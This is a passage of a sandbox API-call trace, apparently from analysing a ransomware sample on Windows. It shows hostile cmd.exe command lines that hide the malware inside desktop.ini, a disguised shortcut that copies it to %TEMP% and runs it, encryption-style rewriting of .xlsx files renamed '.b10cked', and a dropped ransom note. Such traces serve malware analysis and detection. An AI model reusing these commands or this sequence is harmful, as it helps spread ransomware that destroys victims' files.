hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb78 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\desktop.ini\" & del /f /q \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\"", lpProcessInformation=0x12fb78*(hProcess=0x114, hThread=0x110, dwProcessId=0x848, dwThreadId=0x858)) returned 1 [0130.454] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0xffffffff) returned 0x0 [0131.220] CloseHandle (hObject=0x114) returned 1 [0131.220] CloseHandle (hObject=0x110) returned 1 [0131.220] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0131.220] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\fcfnnEKYsCveHRXmenn", lpFindFileData=0x12f9e4 | out: lpFindFileData=0x12f9e4) returned 0x1fec00 [0131.220] FindClose (in: hFindFile=0x1fec00 | out: hFindFile=0x1fec00) returned 1 [0131.220] GetTickCount () returned 0x29d76 [0131.220] QueryPerformanceCounter (in: lpPerformanceCount=0x12fbfc | out: lpPerformanceCount=0x12fbfc*=18800951491) returned 1 [0131.220] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x47\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0131.220] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x4c\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0131.220] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, 
cchWideChar=2047 | out: lpWideCharStr="\x74\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0131.220] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x73\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0131.220] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x72\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0131.221] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x4e\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0131.221] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x42\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0131.221] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x77\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0131.221] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0131.221] CharUpperBuffW (in: lpsz="explorer.exe \"[DIR_NAME]\" & type \"[DIR_NAME]\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"", cchLength=0x65 | out: lpsz="EXPLORER.EXE \"[DIR_NAME]\" & TYPE \"[DIR_NAME]\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"") returned 0x65 [0131.221] CharUpperBuffW (in: lpsz="[DIR_NAME]", cchLength=0xa | out: lpsz="[DIR_NAME]") returned 0xa [0131.221] CharUpperBuffW (in: lpsz="explorer.exe \"fcfnnEKYsCveHRXmenn\" & type 
\"fcfnnEKYsCveHRXmenn\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"", cchLength=0x77 | out: lpsz="EXPLORER.EXE \"FCFNNEKYSCVEHRXMENN\" & TYPE \"FCFNNEKYSCVEHRXMENN\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"") returned 0x77 [0131.221] CharUpperBuffW (in: lpsz="[HID_NAME]", cchLength=0xa | out: lpsz="[HID_NAME]") returned 0xa [0131.221] CharUpperBuffW (in: lpsz="explorer.exe \"fcfnnEKYsCveHRXmenn\" & type \"fcfnnEKYsCveHRXmenn\\desktop.ini\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"", cchLength=0x78 | out: lpsz="EXPLORER.EXE \"FCFNNEKYSCVEHRXMENN\" & TYPE \"FCFNNEKYSCVEHRXMENN\\DESKTOP.INI\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"") returned 0x78 [0131.221] CharUpperBuffW (in: lpsz="[EXE_NAME]", cchLength=0xa | out: lpsz="[EXE_NAME]") returned 0xa [0131.221] CoInitialize (pvReserved=0x0) returned 0x0 [0131.221] CoCreateInstance (in: rclsid=0x4e06a4*(Data1=0x21401, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pUnkOuter=0x0, dwClsContext=0x5, riid=0x4b0dcc*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x12fc10 | out: ppv=0x12fc10*=0x1d3e18) returned 0x0 [0131.223] ShellLink:IUnknown:QueryInterface (in: This=0x1d3e18, riid=0x4d36fc*(Data1=0x214f9, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x12fbc8 | out: ppvObject=0x12fbc8*=0x1d3df0) returned 0x0 [0131.223] ShellLink:IUnknown:QueryInterface (in: This=0x1d3e18, riid=0x4d370c*(Data1=0x10b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x12fbc8 | out: ppvObject=0x12fbc8*=0x1d3dfc) returned 0x0 [0131.223] ShellLink:IShellLinkW:SetPath (This=0x1d3df0, pszFile="%SystemRoot%\\system32\\cmd.exe") returned 0x0 [0131.225] ShellLink:IShellLinkW:SetArguments (This=0x1d3df0, pszArgs="/C explorer.exe 
\"fcfnnEKYsCveHRXmenn\" & type \"fcfnnEKYsCveHRXmenn\\desktop.ini\" > \"%TEMP%\\GLtsrNBw.exe\" && \"%TEMP%\\GLtsrNBw.exe\"") returned 0x0 [0131.225] ShellLink:IShellLinkW:SetWorkingDirectory (This=0x1d3df0, pszDir="%CD%") returned 0x0 [0131.225] ShellLink:IShellLinkW:SetIconLocation (This=0x1d3df0, pszIconPath="%SystemRoot%\\system32\\shell32.dll", iIcon=3) returned 0x0 [0131.225] ShellLink:IShellLinkW:SetShowCmd (This=0x1d3df0, iShowCmd=7) returned 0x0 [0131.225] ShellLink:IPersistFile:Save (This=0x1d3dfc, pszFileName="C:\\Users\\EEBsYm5\\Documents\\fcfnnEKYsCveHRXmenn.lnk", fRemember=0) returned 0x0 [0131.233] ShellLink:IUnknown:Release (This=0x1d3dfc) returned 0x2 [0131.233] ShellLink:IUnknown:Release (This=0x1d3df0) returned 0x1 [0131.233] ShellLink:IUnknown:Release (This=0x1d3e18) returned 0x0 [0131.233] CoUninitialize () [0131.234] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0131.234] ReleaseMutex (hMutex=0xf8) returned 1 [0131.234] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0131.234] ReleaseMutex (hMutex=0xf8) returned 1 [0131.234] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0131.234] ReleaseMutex (hMutex=0xf8) returned 1 [0131.234] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0131.234] ReleaseMutex (hMutex=0xf8) returned 1 [0131.234] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\gjVvzAf3d4AVCevrZIj.xlsx" (normalized: "c:\\users\\eebsym5\\documents\\gjvvzaf3d4avcevrzij.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0131.234] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0131.234] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: 
lpDistanceToMoveHigh=0x12ed00*=0) returned 0x6b8c [0131.234] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0131.234] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=18802357866) returned 1 [0131.234] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0131.234] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x6b8c [0131.235] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0131.235] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0131.235] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x6b8c [0131.235] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0131.235] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0131.235] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x6b8c [0131.235] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0131.235] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: 
lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0131.235] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x6b8c [0131.235] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0131.235] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0131.235] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x6b8c [0131.235] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0131.235] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0131.235] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x6b8c [0131.235] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0131.235] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0131.235] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x6b8c [0131.236] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0131.236] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, 
lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0131.236] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x6b8c [0131.236] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0131.236] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0131.236] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x6b8c [0131.236] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0131.236] SetFilePointer (in: hFile=0x114, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x66a4 [0131.236] ReadFile (in: hFile=0x114, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0131.237] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0131.237] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0131.237] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x6b8c [0131.237] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: 
lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0131.237] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0131.237] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0131.238] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x6b8c [0131.238] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0131.238] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0131.238] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x35c5, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x35c5, lpOverlapped=0x0) returned 1 [0131.238] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0131.238] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0x35c5, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0x35c5, lpOverlapped=0x0) returned 1 [0131.238] SetFilePointer (in: hFile=0x114, lDistanceToMove=-13765, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x35c7 [0131.238] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x35c5, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x35c5, lpOverlapped=0x0) returned 1 [0131.238] SetFilePointer (in: hFile=0x114, lDistanceToMove=-13765, 
lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x35c7 [0131.239] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0x35c5, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0x35c5, lpOverlapped=0x0) returned 1 [0131.244] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="gjVvzAf3d4AVCevrZIj.xlsx", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0131.244] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="gjVvzAf3d4AVCevrZIj.xlsx", cchWideChar=24, lpMultiByteStr=0x132f7bc, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gjVvzAf3d4AVCevrZIj.xlsx", lpUsedDefaultChar=0x0) returned 24 [0131.244] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x6b8c [0131.244] WriteFile (in: hFile=0x114, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0131.244] CloseHandle (hObject=0x114) returned 1 [0131.245] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\gjVvzAf3d4AVCevrZIj.xlsx", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\GJVVZA~1.XLS") returned 0x26 [0131.245] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\") returned 0x1a [0131.245] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\GJVVZA~1.XLS\" 
\"C:\\Users\\EEBsYm5\\DOCUME~1\\gjVvzAf3d4AVCevrZIj.xlsx.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\GJVVZA~1.XLS\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\gjVvzAf3d4AVCevrZIj.xlsx.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x110, hThread=0x114, dwProcessId=0xa50, dwThreadId=0x9a4)) returned 1 [0131.247] CloseHandle (hObject=0x110) returned 1 [0131.247] CloseHandle (hObject=0x114) returned 1 [0131.247] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\", cchLength=0x1b | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\") returned 0x1b [0131.247] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\fcfnnEKYsCveHRXmenn\\", cchLength=0x2f | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\FCFNNEKYSCVEHRXMENN\\") returned 0x2f [0131.247] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DOCUMENTS\\", cchCount1=27, lpString2="C:\\USERS\\EEBSYM5\\DOCUMENTS\\FCFNNEKYSCVEHRXMENN\\", cchCount2=47) returned 1 [0131.247] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\", cchLength=0x1b | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\") returned 0x1b [0131.247] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0131.247] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DOCUMENTS\\", cchCount1=27, lpString2="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount2=25) returned 3 [0131.247] GetShortPathNameW (in: 
lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF") returned 0x2d [0131.248] CharUpperBuffW (in: lpsz="type \"[FROM_PATH]\" > \"[TO_PATH]\"", cchLength=0x20 | out: lpsz="TYPE \"[FROM_PATH]\" > \"[TO_PATH]\"") returned 0x20 [0131.248] CharUpperBuffW (in: lpsz="[FROM_PATH]", cchLength=0xb | out: lpsz="[FROM_PATH]") returned 0xb [0131.248] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\") returned 0x1a [0131.248] CharUpperBuffW (in: lpsz="type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"[TO_PATH]\"", cchLength=0x42 | out: lpsz="TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\BL0CKE~1.RTF\" > \"[TO_PATH]\"") returned 0x42 [0131.248] CharUpperBuffW (in: lpsz="[TO_PATH]", cchLength=0x9 | out: lpsz="[TO_PATH]") returned 0x9 [0131.248] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\Bl0cked-ReadMe.rtf\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fb94*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb84 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\Bl0cked-ReadMe.rtf\"", lpProcessInformation=0x12fb84*(hProcess=0x110, hThread=0x114, dwProcessId=0x994, dwThreadId=0x998)) returned 1 [0131.249] CloseHandle (hObject=0x110) 
returned 1 [0131.250] CloseHandle (hObject=0x114) returned 1 [0131.250] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\documents\\bl0cked-readme.rtf")) returned 0x20 [0131.250] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0131.250] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents", lpFindFileData=0x12f9e4 | out: lpFindFileData=0x12f9e4) returned 0x1fec00 [0131.250] FindClose (in: hFindFile=0x1fec00 | out: hFindFile=0x1fec00) returned 1 [0131.250] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0131.250] ReleaseMutex (hMutex=0xf8) returned 1 [0131.250] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0131.250] ReleaseMutex (hMutex=0xf8) returned 1 [0131.250] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0131.250] ReleaseMutex (hMutex=0xf8) returned 1 [0131.250] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0131.250] ReleaseMutex (hMutex=0xf8) returned 1 [0131.250] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\Muum.xlsx" (normalized: "c:\\users\\eebsym5\\documents\\muum.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, 